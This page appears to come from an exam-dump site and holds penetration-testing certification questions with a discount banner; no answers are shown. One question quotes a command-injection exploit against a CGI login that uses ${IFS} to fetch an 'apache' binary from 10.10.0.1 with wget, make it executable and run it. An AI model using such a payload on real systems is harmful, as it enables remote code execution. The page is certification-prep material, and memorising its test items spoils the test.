Weekend Sale - Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: sntaclus

examout.co

A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server.

Which of the following can be done with the pcap to gain access to the server?

A.

Perform vertical privilege escalation.

B.

Replay the captured traffic to the server to recreate the session.

C.

Use John the Ripper to crack the password.

D.

Utilize a pass-the-hash attack.

A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?

A.

Implement a recurring cybersecurity awareness education program for all users.

B.

Implement multifactor authentication on all corporate applications.

C.

Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.

D.

Implement an email security gateway to block spam and malware from email communications.

A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?

A.

Add a dependency checker into the tool chain.

B.

Perform routine static and dynamic analysis of committed code.

C.

Validate API security settings before deployment.

D.

Perform fuzz testing of compiled binaries.

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:

exploit = “POST ”

exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} –

c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apac he;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a”

exploit += “HTTP/1.1”

Which of the following commands should the penetration tester run post-engagement?

A.

grep –v apache ~/.bash_history > ~/.bash_history

B.

rm –rf /tmp/apache

C.

chmod 600 /tmp/apache

D.

taskkill /IM “apache” /F

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.

Which of the following describes the scope of the assessment?

A.

Partially known environment testing

B.

Known environment testing

C.

Unknown environment testing

D.

Physical environment testing

Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

A.

Whether the cloud service provider allows the penetration tester to test the environment

B.

Whether the specific cloud services are being used by the application

C.

The geographical location where the cloud services are running

D.

Whether the country where the cloud service is based has any impeding laws

A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit?

A.

Perform XSS.

B.

Conduct a watering-hole attack.

C.

Use BeEF.

D.

Use browser autopwn.

A penetration tester needs to access a building that is guarded by locked gates, a security team, and cameras. Which of the following is a technique the tester can use to gain access to the IT framework without being detected?

A.

Pick a lock.

B.

Disable the cameras remotely.

C.

Impersonate a package delivery worker.

D.

Send a phishing email.

A new client hired a penetration-testing company for a month-long contract for various security assessments against the client’s new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings.

Which of the following is most important for the penetration tester to define FIRST?

A.

Establish the format required by the client.

B.

Establish the threshold of risk to escalate to the client immediately.

C.

Establish the method of potential false positives.

D.

Establish the preferred day of the week for reporting.

PCI DSS requires which of the following as part of the penetration-testing process?

A.

The penetration tester must have cybersecurity certifications.

B.

The network must be segmented.

C.

Only externally facing systems should be tested.

D.

The assessment must be performed during non-working hours.